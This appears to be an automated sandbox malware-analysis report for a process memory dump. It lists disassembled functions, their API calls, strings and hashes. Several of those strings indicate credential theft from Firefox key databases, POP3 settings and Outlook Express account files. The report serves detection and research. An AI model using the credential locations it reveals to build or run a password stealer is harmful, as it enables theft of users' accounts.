                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                        • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                        • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                          • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                          • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                          • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                        • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$DialogMessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2485852401-0
                                                                                        • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                        • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                        • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                        • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                        Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                        • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                        • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                        • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                        • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                        • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                        • String ID:
                                                                                        • API String ID: 3642520215-0
                                                                                        • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                        • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                        • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                        • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                        Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                        • memset.MSVCRT ref: 00405C3B
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                        • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                        • String ID:
                                                                                        • API String ID: 2313361498-0
                                                                                        • Opcode ID: 65c1053850b536f20c9e4e8c1a21b7c0142c4311e31a1eb4f029477ac17a45e0
                                                                                        • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                        • Opcode Fuzzy Hash: 65c1053850b536f20c9e4e8c1a21b7c0142c4311e31a1eb4f029477ac17a45e0
                                                                                        • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                        Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                        • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                        • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Defer$Rect$BeginClient
                                                                                        • String ID:
                                                                                        • API String ID: 2126104762-0
                                                                                        • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                        • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                        • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                        • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                        Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                        • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                        • GetDC.USER32(00000000), ref: 004072FB
                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                        • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                        • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                        • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                        • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                        • String ID:
                                                                                        • API String ID: 1999381814-0
                                                                                        • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                        • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                        • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                        • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                        Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                        • API String ID: 1297977491-3883738016
                                                                                        • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                        • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                        • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                        • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                        Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                        • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID: gj
                                                                                        • API String ID: 438689982-4203073231
                                                                                        • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                        • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                        • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                        • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                        Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm$__aullrem
                                                                                        • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                        • API String ID: 643879872-978417875
                                                                                        • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                        • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                        • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                        • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                        Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040DAE3
                                                                                        • memset.MSVCRT ref: 0040DAF7
                                                                                        • memset.MSVCRT ref: 0040DB0B
                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                          • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset$strlen$_memicmp
                                                                                        • String ID: user_pref("
                                                                                        • API String ID: 765841271-2487180061
                                                                                        • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                        • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                        • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                        • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                        Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                        • memset.MSVCRT ref: 004058C3
                                                                                        • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                        • SetFocus.USER32(?), ref: 00405976
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                        • String ID:
                                                                                        • API String ID: 4281309102-0
                                                                                        • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                        • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                        • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                        • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                        Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                        • _mbscat.MSVCRT ref: 0040A8FF
                                                                                        • sprintf.MSVCRT ref: 0040A921
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite_mbscatsprintfstrlen
                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                        • API String ID: 1631269929-4153097237
                                                                                        • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                        • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                        • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                        • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                        Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040810E
                                                                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,68127B60,?), ref: 004081B9
                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                        • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                        • API String ID: 524865279-2190619648
                                                                                        • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                        • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                        • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                        • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                        Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00406B8E
                                                                                        • strlen.MSVCRT ref: 00406B99
                                                                                        • strlen.MSVCRT ref: 00406BFF
                                                                                        • strlen.MSVCRT ref: 00406C0D
                                                                                        • strlen.MSVCRT ref: 00406BA7
                                                                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$_mbscat_mbscpymemset
                                                                                        • String ID: key3.db$key4.db
                                                                                        • API String ID: 581844971-3557030128
                                                                                        • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                        • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                        • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                        • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                        Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                        • String ID: 0$6
                                                                                        • API String ID: 2300387033-3849865405
                                                                                        • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                        • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                        • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                        • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                        Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004076D7
                                                                                        • sprintf.MSVCRT ref: 00407704
                                                                                        • strlen.MSVCRT ref: 00407710
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                        • strlen.MSVCRT ref: 00407733
                                                                                        • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpystrlen$memsetsprintf
                                                                                        • String ID: %s (%s)
                                                                                        • API String ID: 3756086014-1363028141
                                                                                        • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                        • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                        • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                        • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                        Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscat$memsetsprintf
                                                                                        • String ID: %2.2X
                                                                                        • API String ID: 125969286-791839006
                                                                                        • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                        • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                        • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                        • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                        Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                        • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                          • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                          • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                          • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                          • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                          • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                          • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                          • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                        • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                        • String ID: ACD
                                                                                        • API String ID: 82305771-620537770
                                                                                        • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                        • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                        • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                        • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                        Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004091EC
                                                                                        • sprintf.MSVCRT ref: 00409201
                                                                                          • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                          • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                          • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                        • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                        • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                        • String ID: caption$dialog_%d
                                                                                        • API String ID: 2923679083-4161923789
                                                                                        • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                        • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
